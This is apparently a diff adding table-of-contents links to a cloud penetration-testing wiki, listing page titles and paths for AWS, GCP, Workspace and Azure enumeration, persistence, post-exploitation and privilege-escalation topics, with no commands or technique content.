+ - [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
+ - [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)
+ - [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md)
+ - [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)
+ - [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md)
+ - [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md)
+ - [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md)
+ - [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md)
+ - [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md)
+ - [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md)
+ - [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
+ - [GCP - IAM, Principals & Org Unauthenticated
Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md)
+ - [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md)
+ - [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md)
+ - [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md)
+- [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md)
+ - [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md)
+ - [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md)
+ - [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md)
+ - [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md)
+ - [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md)
+ - [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md)
+ - [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md)
+ - [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md)
+ - [GWS - App
Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md)
+- [AWS Pentesting](pentesting-cloud/aws-security/README.md)
+ - [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md)
+ - [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
+ - [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md)
+ - [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md)
+ - [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md)
+ - [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md)
+ - [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md)
+ - [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md)
+ - [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md)
+ - [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md)
+ - [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md)
+ - [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md)
+ - [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md)
+ - [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md)
+ - [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md)
+ - [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md)
+ - [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md)
+ - [AWS - Lightsail
Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
+ - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
+ - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
+ - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
+ - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
+ - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
+ - [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md)
+ - [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
+ - [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
+ - [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
+ - [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md)
+ - [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md)
+ - [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md)
+ - [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md)
+ - [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md)
+ - [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md)
+ - [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md)
+ - [AWS - EC2, EBS, SSM & VPC Post
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
+ - [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
+ - [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md)
+ - [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md)
+ - [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md)
+ - [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md)
+ - [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md)
+ - [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md)
+ - [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md)
+ - [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md)
+ - [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md)
+ - [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
+ - [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md)
+ - [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md)
+ - [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md)
+ - [AWS - S3 Post
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md)
+ - [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md)
+ - [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md)
+ - [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md)
+ - [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md)
+ - [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md)
+ - [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md)
+ - [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md)
+ - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md)
+ - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
+ - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md)
+ - [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md)
+ - [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md)
+ - [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md)
+ - [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md)
+ - [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md)
+ - [iam:PassRole,
codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md)
+ - [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md)
+ - [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
+ - [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md)
+ - [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md)
+ - [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md)
+ - [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md)
+ - [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md)
+ - [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md)
+ - [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md)
+ - [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md)
+ - [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md)
+ - [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md)
+ - [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md)
+ - [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md)
+ - [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md)
+ - [AWS - Glue
Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md)
+ - [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md)
+ - [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md)
+ - [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md)
+ - [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md)
+ - [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md)
+ - [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md)
+ - [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md)
+ - [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md)
+ - [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md)
+ - [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md)
+ - [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md)
+ - [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md)
+ - [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
+ - [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md)
+ - [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md)
+ - [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md)
+ - [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md)
+ - [AWS -
SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md)
+ - [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md)
+ - [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md)
+ - [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md)
+ - [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md)
+ - [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md)
+ - [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md)
+ - [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md)
+ - [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md)
+ - [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
+ - [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md)
+ - [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md)
+ - [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md)
+ - [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md)
+ - [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md)
+ - [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md)
+ - [AWS - Security Hub
Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md)
+ - [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md)
+ - [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md)
+ - [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md)
+ - [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md)
+ - [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md)
+ - [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md)
+ - [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md)
+ - [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md)
+ - [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md)
+ - [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md)
+ - [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md)
+ - [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md)
+ - [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
+ - [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md)
+ - [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md)
+ - [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md)
+ - [AWS - EC2,
EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md)
+ - [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md)
+ - [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md)
+ - [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md)
+ - [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md)
+ - [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md)
+ - [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md)
+ - [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md)
+ - [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md)
+ - [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md)
+ - [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md)
+ - [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md)
+ - [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md)
+ - [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md)
+ - [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md)
+ - [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md)
+ - [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md)
+ - [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md)
+ - [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md)
+ - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
+ - [AWS - Relational Database (RDS)
Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
+ - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
+ - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
+ - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
+ - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
+ - [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md)
+ - [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md)
+ - [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md)
+ - [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md)
+ - [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md)
+ - [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md)
+ - [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md)
+ - [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md)
+ - [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
+ - [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
+ - [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
+ - [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md)
+ - [AWS - DynamoDB Unauthenticated
Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md)
+ - [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md)
+ - [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md)
+ - [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
+ - [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
+ - [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md)
+ - [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
+ - [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
+ - [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md)
+ - [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md)
+ - [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
+ - [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md)
+ - [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md)
+ - [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md)
+ - [AWS - RDS Unauthenticated
Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md)
+ - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md)
+ - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
+ - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md)
+ - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
+- [Azure Pentesting](pentesting-cloud/azure-security/README.md)
+ - [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
+ - [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md)
+ - [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
+ - [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)
+ - [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md)
+ - [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
+ - [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+ - [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
+ - [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
+ - [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
+ - [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
+ - [Az - Application
Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
+ - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
+ - [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md)
+ - [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md)
+ - [Az - Azure App Service & Function Apps](pentesting-cloud/azure-security/az-services/az-app-service.md)
+ - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
+ - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
+ - [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md)
+ - [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md)
+ - [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md)
+ - [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md)
+ - [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md)
+ - [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md)
+ - [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md)
+ - [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md)
+ - [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md)
+ - [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md)
+ - [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md)
+ - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
+ - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
+ - [Az AD Connect - Hybrid
Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
+ - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
